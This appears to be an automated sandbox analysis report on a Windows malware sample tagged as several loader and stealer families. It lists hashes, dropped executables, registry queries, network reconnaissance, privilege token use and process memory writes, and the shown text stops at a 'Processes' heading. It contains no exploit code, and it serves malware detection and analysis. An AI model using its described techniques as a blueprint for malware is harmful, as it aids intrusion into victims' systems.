Analysis
-
max time kernel
149s -
max time network
146s -
platform
windows10-2004_x64 -
resource
win10v2004-20250610-en -
resource tags
arch:x64arch:x86image:win10v2004-20250610-enlocale:en-usos:windows10-2004-x64system -
submitted
03/07/2025, 05:56
Static task
static1
Behavioral task
behavioral1
Sample
2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe
Resource
win10v2004-20250610-en
General
-
Target
2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe
-
Size
361KB
-
MD5
8d6081be15596b9b110b0995ffc40dfc
-
SHA1
259450770e007ca32becda53a1d76a55bf22b0c5
-
SHA256
cafb08a742ddcb1982a652b4fc77a1ef0979e11787749fa46fa3bca63d15a429
-
SHA512
9b0beefd51f55bd31cb6be7c98bf3736c2bb1a831f54e1d9cea3607d7fe147125943573952d70853308bf78ec9cb228b8b7e07b66f927a0bcae9eff351f477bd
-
SSDEEP
6144:hflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:hflfAsiVGjSGecvX
Malware Config
Signatures
-
Executes dropped EXE 64 IoCs
pid Process 3232 aytqljdbvtolgeyw.exe 4756 CreateProcess.exe 868 igbytrljdb.exe 4944 CreateProcess.exe 540 CreateProcess.exe 624 i_igbytrljdb.exe 5184 CreateProcess.exe 1460 nigaysqkid.exe 5740 CreateProcess.exe 984 CreateProcess.exe 1132 i_nigaysqkid.exe 3708 CreateProcess.exe 1404 icavsnlfdx.exe 2872 CreateProcess.exe 5056 CreateProcess.exe 5928 i_icavsnlfdx.exe 3016 CreateProcess.exe 5036 kfdxvpnhfa.exe 3240 CreateProcess.exe 1996 CreateProcess.exe 3824 i_kfdxvpnhfa.exe 5060 CreateProcess.exe 2952 czusmkecxu.exe 4632 CreateProcess.exe 316 CreateProcess.exe 4576 i_czusmkecxu.exe 5608 CreateProcess.exe 768 zurmjecwuo.exe 3528 CreateProcess.exe 5900 CreateProcess.exe 936 i_zurmjecwuo.exe 5368 CreateProcess.exe 2200 rojhbztrlj.exe 5472 CreateProcess.exe 5812 CreateProcess.exe 4696 i_rojhbztrlj.exe 5008 CreateProcess.exe 3604 rojgbztrlj.exe 4224 CreateProcess.exe 4336 CreateProcess.exe 3888 i_rojgbztrlj.exe 6128 CreateProcess.exe 3340 ljdbwtolge.exe 5456 CreateProcess.exe 2828 CreateProcess.exe 5004 i_ljdbwtolge.exe 696 CreateProcess.exe 2312 jdbvtnlgdy.exe 1764 CreateProcess.exe 5872 CreateProcess.exe 5284 i_jdbvtnlgdy.exe 4104 CreateProcess.exe 1840 cavsnlfdxv.exe 1192 CreateProcess.exe 704 CreateProcess.exe 4316 i_cavsnlfdxv.exe 1996 CreateProcess.exe 4716 ifaxsqkica.exe 1540 CreateProcess.exe 4428 CreateProcess.exe 4672 i_ifaxsqkica.exe 5060 CreateProcess.exe 736 fcxvpnhfzx.exe 3296 CreateProcess.exe -
System Location Discovery: System Language Discovery 1 TTPs 43 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_zurmjecwuo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ifaxsqkica.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rojhbztrlj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_nigaysqkid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rojgbztrlj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_ifaxsqkica.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_czurmkecwu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language eywqojgbyt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language zurmjecwuo.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_rojhbztrlj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jdbvtnlgdy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cavsnlfdxv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_hbztrljebw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ytqlidbvtn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aytqljdbvtolgeyw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language igbytrljdb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language czusmkecxu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ljdbwtolge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_fcxvpnhfzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_eywqojgbyt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language gaytqljdbv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_gaytqljdbv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_icavsnlfdx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kfdxvpnhfa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_rojgbztrlj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_ljdbwtolge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_jdbvtnlgdy.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fcxvpnhfzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aysqkicavs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_igbytrljdb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_cavsnlfdxv.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_kecwupezwr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hbztrljebw.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_ytqlidbvtn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CreateProcess.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icavsnlfdx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_kfdxvpnhfa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language czurmkecwu.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kecwupezwr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nigaysqkid.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language i_czusmkecxu.exe -
Gathers network information 2 TTPs 20 IoCs
Uses commandline utility to view network configuration.
pid Process 2572 ipconfig.exe 4956 ipconfig.exe 2660 ipconfig.exe 1228 ipconfig.exe 4080 ipconfig.exe 2224 ipconfig.exe 4516 ipconfig.exe 4108 ipconfig.exe 1776 ipconfig.exe 3272 ipconfig.exe 4064 ipconfig.exe 5044 ipconfig.exe 2672 ipconfig.exe 3984 ipconfig.exe 5280 ipconfig.exe 4668 ipconfig.exe 4064 ipconfig.exe 2764 ipconfig.exe 5700 ipconfig.exe 4880 ipconfig.exe -
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1104561260" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 10b0e83fdfebdb01 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1101904593" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\GPU IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 2084e13fdfebdb01 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.19041.546\"hypervisor=\"No Hypervisor (No SLAT)\"" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068216fd883ba504490bcddae6c93ad640000000002000000000010660000000100002000000096a1a64681265f02940a2075b8cccb18f3f56d43448dd07c4582970f165da34a000000000e800000000200002000000016eb7d270451a4d8db8d9221ced1189219eb1dcc1fa40881360880111be80a0a20000000779e38949e613405721d1e028d6b16456eb5d50e2d0c8b919cdaae85ee0e90b140000000f8bd8514ff257648793c3420a6f43ec5025dfebdb506de106542c46c4176de67eb0988521217b5bd7fa73b5905edb93805efeaff0d425819a20671e25e4fdb7a iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000068216fd883ba504490bcddae6c93ad640000000002000000000010660000000100002000000067a64d9b7108d05d09608524eac95ad92d8a2750f42b02e66325c5ec4ec2ea24000000000e80000000020000200000000181cfe8fc14c3f5a6ab15c5ccf30dc7f477e28ec3a01692de62ba3bf2792c0e20000000a5fa400c4110b656e6e054d9681f70bd14870cdd3b99c6106d475e3005382475400000005496deb7cd33405dbd5c1acb17afc3146955935b327b05d08a92bdffa40f2fb690899b615bdd204dcb6adb4fcae92a10245bde4c2fd3a790bfbdc8c51fe6fd17 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "31189983" IEXPLORE.EXE Set value (str) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{6A1E55FB-57D2-11F0-9303-DA74FA597C7D} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\SOFTWARE\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "458287143" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2012121138-1878458325-808874697-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 3232 aytqljdbvtolgeyw.exe 3232 aytqljdbvtolgeyw.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe -
Suspicious behavior: LoadsDriver 20 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 624 i_igbytrljdb.exe Token: SeDebugPrivilege 1132 i_nigaysqkid.exe Token: SeDebugPrivilege 5928 i_icavsnlfdx.exe Token: SeDebugPrivilege 3824 i_kfdxvpnhfa.exe Token: SeDebugPrivilege 4576 i_czusmkecxu.exe Token: SeDebugPrivilege 936 i_zurmjecwuo.exe Token: SeDebugPrivilege 4696 i_rojhbztrlj.exe Token: SeDebugPrivilege 3888 i_rojgbztrlj.exe Token: SeDebugPrivilege 5004 i_ljdbwtolge.exe Token: SeDebugPrivilege 5284 i_jdbvtnlgdy.exe Token: SeDebugPrivilege 4316 i_cavsnlfdxv.exe Token: SeDebugPrivilege 4672 i_ifaxsqkica.exe Token: SeDebugPrivilege 2228 i_fcxvpnhfzx.exe Token: SeDebugPrivilege 2788 i_czurmkecwu.exe Token: SeDebugPrivilege 5204 i_kecwupezwr.exe Token: SeDebugPrivilege 4784 i_hbztrljebw.exe Token: SeDebugPrivilege 556 i_eywqojgbyt.exe Token: SeDebugPrivilege 4704 i_ytqlidbvtn.exe Token: SeDebugPrivilege 2188 i_gaytqljdbv.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 5760 iexplore.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 5760 iexplore.exe 5760 iexplore.exe 3964 IEXPLORE.EXE 3964 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4052 wrote to memory of 3232 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 90 PID 4052 wrote to memory of 3232 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 90 PID 4052 wrote to memory of 3232 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 90 PID 4052 wrote to memory of 5760 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 91 PID 4052 wrote to memory of 5760 4052 2025-07-03_8d6081be15596b9b110b0995ffc40dfc_amadey_darkgate_elex_rhadamanthys_smoke-loader_stop.exe 91 PID 5760 wrote to memory of 3964 5760 iexplore.exe 92 PID 5760 wrote to memory of 3964 5760 iexplore.exe 92 PID 5760 wrote to memory of 3964 5760 iexplore.exe 92 PID 3232 wrote to memory of 4756 3232 aytqljdbvtolgeyw.exe 93 PID 3232 wrote to memory of 4756 3232 aytqljdbvtolgeyw.exe 93 PID 3232 wrote to memory of 4756 3232 aytqljdbvtolgeyw.exe 93 PID 868 wrote to memory of 4944 868 igbytrljdb.exe 96 PID 868 wrote to memory of 4944 868 igbytrljdb.exe 96 PID 868 wrote to memory of 4944 868 igbytrljdb.exe 96 PID 3232 wrote to memory of 540 3232 aytqljdbvtolgeyw.exe 101 PID 3232 wrote to memory of 540 3232 aytqljdbvtolgeyw.exe 101 PID 3232 wrote to memory of 540 3232 aytqljdbvtolgeyw.exe 101 PID 3232 wrote to memory of 5184 3232 aytqljdbvtolgeyw.exe 106 PID 3232 wrote to memory of 5184 3232 aytqljdbvtolgeyw.exe 106 PID 3232 wrote to memory of 5184 3232 aytqljdbvtolgeyw.exe 106 PID 1460 wrote to memory of 5740 1460 nigaysqkid.exe 108 PID 1460 wrote to memory of 5740 1460 nigaysqkid.exe 108 PID 1460 wrote to memory of 5740 1460 nigaysqkid.exe 108 PID 3232 wrote to memory of 984 3232 aytqljdbvtolgeyw.exe 113 PID 3232 wrote to memory of 984 3232 aytqljdbvtolgeyw.exe 113 PID 3232 wrote to memory of 984 3232 aytqljdbvtolgeyw.exe 113 PID 3232 wrote to memory of 3708 3232 aytqljdbvtolgeyw.exe 115 PID 3232 wrote to memory of 3708 3232 aytqljdbvtolgeyw.exe 115 PID 3232 wrote to memory of 3708 3232 aytqljdbvtolgeyw.exe 115 PID 1404 wrote to memory of 2872 1404 icavsnlfdx.exe 117 PID 1404 wrote to memory of 2872 1404 icavsnlfdx.exe 117 PID 1404 wrote to memory of 2872 1404 icavsnlfdx.exe 117 PID 3232 wrote to memory of 5056 3232 aytqljdbvtolgeyw.exe 120 PID 3232 wrote to memory of 5056 3232 aytqljdbvtolgeyw.exe 120 PID 3232 wrote to memory of 5056 3232 aytqljdbvtolgeyw.exe 120 PID 3232 wrote to memory of 3016 3232 aytqljdbvtolgeyw.exe 122 PID 3232 wrote to memory of 3016 3232 aytqljdbvtolgeyw.exe 122 PID 3232 wrote to memory of 3016 3232 aytqljdbvtolgeyw.exe 122 PID 5036 wrote to memory of 3240 5036 kfdxvpnhfa.exe 124 PID 5036 wrote to memory of 3240 5036 kfdxvpnhfa.exe 124 PID 5036 wrote to memory of 3240 5036 kfdxvpnhfa.exe 124 PID 3232 wrote to memory of 1996 3232 aytqljdbvtolgeyw.exe 128 PID 3232 wrote to memory of 1996 3232 aytqljdbvtolgeyw.exe 128 PID 3232 wrote to memory of 1996 3232 aytqljdbvtolgeyw.exe 128 PID 3232 wrote to memory of 5060 3232 aytqljdbvtolgeyw.exe 130 PID 3232 wrote to memory of 5060 3232 aytqljdbvtolgeyw.exe 130 PID 3232 wrote to memory of 5060 3232 aytqljdbvtolgeyw.exe 130 PID 2952 wrote to memory of 4632 2952 czusmkecxu.exe 132 PID 2952 wrote to memory of 4632 2952 czusmkecxu.exe 132 PID 2952 wrote to memory of 4632 2952 czusmkecxu.exe 132 PID 3232 wrote to memory of 316 3232 aytqljdbvtolgeyw.exe 135 PID 3232 wrote to memory of 316 3232 aytqljdbvtolgeyw.exe 135 PID 3232 wrote to memory of 316 3232 aytqljdbvtolgeyw.exe 135 PID 3232 wrote to memory of 5608 3232 aytqljdbvtolgeyw.exe 139 PID 3232 wrote to memory of 5608 3232 aytqljdbvtolgeyw.exe 139 PID 3232 wrote to memory of 5608 3232 aytqljdbvtolgeyw.exe 139 PID 768 wrote to memory of 3528 768 zurmjecwuo.exe 141 PID 768 wrote to memory of 3528 768 zurmjecwuo.exe 141 PID 768 wrote to memory of 3528 768 zurmjecwuo.exe 141 PID 3232 wrote to memory of 5900 3232 aytqljdbvtolgeyw.exe 144 PID 3232 wrote to memory of 5900 3232 aytqljdbvtolgeyw.exe 144 PID 3232 wrote to memory of 5900 3232 aytqljdbvtolgeyw.exe 144 PID 3232 wrote to memory of 5368 3232 aytqljdbvtolgeyw.exe 147 PID 3232 wrote to memory of 5368 3232 aytqljdbvtolgeyw.exe 147
Processes
-
